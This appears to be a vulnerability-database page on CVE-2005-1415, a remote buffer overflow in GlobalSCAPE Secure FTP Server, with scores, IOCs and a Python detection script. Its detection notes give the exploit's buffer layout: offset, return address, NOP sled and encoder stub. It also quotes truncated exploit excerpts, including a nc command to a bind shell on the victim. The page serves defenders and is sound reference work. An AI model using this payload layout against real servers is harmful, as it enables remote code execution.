CVE-2005-1415
Published 2005-05-03
CVE-2005-1415: Buffer overflow in GlobalSCAPE Secure FTP Server 3.0.2 allows remote authenticated users to execute arbitrary code via a long FTP command.
Priority P3 · 54 · critical · 10 (CVSS 2.0)
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 60.46% (99.0th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| globalscape | secure_ftp_server | — | — |
| globalscape | secure_ftp_server | — | — |
Detection & IOCs (extracted from sources)
bytes: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff
bytes: \x41*2043 + \x7C\x4F\xED\xBB + \x90*36 + shellcode
- Buffer overflow is triggered by sending an oversized FTP command (2043+ bytes) after authentication; detect abnormally long FTP command payloads exceeding 2043 bytes on port 21.
- Exploit requires a valid authenticated FTP session (or anonymous access); monitor for FTP logins immediately followed by anomalously large single-command payloads.
- The shellcode prepend encoder stub \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff appears at the start of the payload; scan FTP traffic for this byte sequence.
- The exploit targets GlobalSCAPE Secure FTP Server versions prior to 3.0.3; fingerprint the FTP banner for versions 3.0, 3.0.1, or 3.0.2 as high-risk targets.
- FTP banner '220 GlobalSCAPE Secure FTP Server (v. 3.0)' identifies a vulnerable unpatched instance; alert on this banner string.
- BadChars for the payload are null bytes, spaces, and lowercase ASCII (0x61-0x7a); the payload will be entirely uppercase/numeric alphanumeric encoded — detect FTP commands containing only uppercase alphanumeric characters of unusual length.
- The standalone Python exploit hardcodes the return address 0x7C4FEDBB, while the Metasploit module uses 0x1002f01f; different builds/patches of the target may require different return addresses.
- The overflow offset is 2043 bytes; the payload space available in the Metasploit module is 1000 bytes after the NOP sled.
- The exploit only works against Windows targets; the Metasploit module platform is restricted to 'win'.
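One way to turn the detection notes above into a check over reassembled FTP control-channel lines (an added example, not code from this page or its sources). The function name, the `(direction, bytes)` input format and the sample session are assumptions; the 2043-byte threshold, the stub bytes and the banner text are the values quoted in the notes.

```python
import re

# Values below are the ones quoted in the page's detection notes.
OVERFLOW_OFFSET = 2043  # bytes of command data before the return address
ENCODER_STUB = bytes.fromhex("eb0359eb05e8f8ffffff")
# Assumption: 3.0.1 and 3.0.2 use the same banner layout as the quoted 3.0 banner.
VULN_BANNER = re.compile(rb"^220 GlobalSCAPE Secure FTP Server \(v\. (3\.0(?:\.[12])?)\)")


def inspect_session(lines):
    """Scan one reassembled FTP control connection.

    lines: iterable of (direction, bytes) with CRLF stripped, where direction
    is "S" for server replies and "C" for client commands.
    Returns a list of (finding, detail) tuples in the order seen.
    """
    findings = []
    logged_in = False
    for direction, data in lines:
        if direction == "S":
            banner = VULN_BANNER.match(data)
            if banner:
                findings.append(("vulnerable-banner", banner.group(1).decode()))
            if data.startswith(b"230"):  # 230 = user logged in
                logged_in = True
            continue
        if ENCODER_STUB in data:
            findings.append(("encoder-stub", data.find(ENCODER_STUB)))
        if len(data) > OVERFLOW_OFFSET:
            # The notes say a login is required first, so rank that case higher.
            kind = "oversized-command-after-login" if logged_in else "oversized-command"
            findings.append((kind, len(data)))
    return findings


# Constructed sample session: benign filler only, no payload bytes.
SAMPLE = [
    ("S", b"220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *"),
    ("C", b"USER anonymous"),
    ("S", b"331 Password required"),
    ("C", b"PASS guest@example.test"),
    ("S", b"230 Login OK"),
    ("C", b"LIST"),
    ("C", b"X" * 2100),
]

if __name__ == "__main__":
    for finding in inspect_session(SAMPLE):
        print(finding)
```

The input must already be split into command lines; a sensor working on raw TCP segments has to reassemble the stream first, or a long command spread over several packets will pass unnoticed.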
No detection rules found.
Exploit-DB
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
exploitdb·2010-10-05
---
##
# $Id: globalscapeftp_input.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GlobalSCAPE Secure FTP Server Input Overflow',
'Description' => %q{
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
All versions prior to 3.0.3 are affected by this flaw. A valid user account (
or anonymous access) is required for this exploit to work.
},
'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ],
'License' => BSD_LICENSE,
'
Exploit-DB
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
exploitdb·2005-05-01
---
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by mati [at] see-security [dot] com
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version
Metasploit
GlobalSCAPE Secure FTP Server Input Overflow
metasploit
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account (or anonymous access) is required for this exploit to work.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html
http://www.cuteftp.com/gsftps/history.asp
http://www.securityfocus.com/bid/13454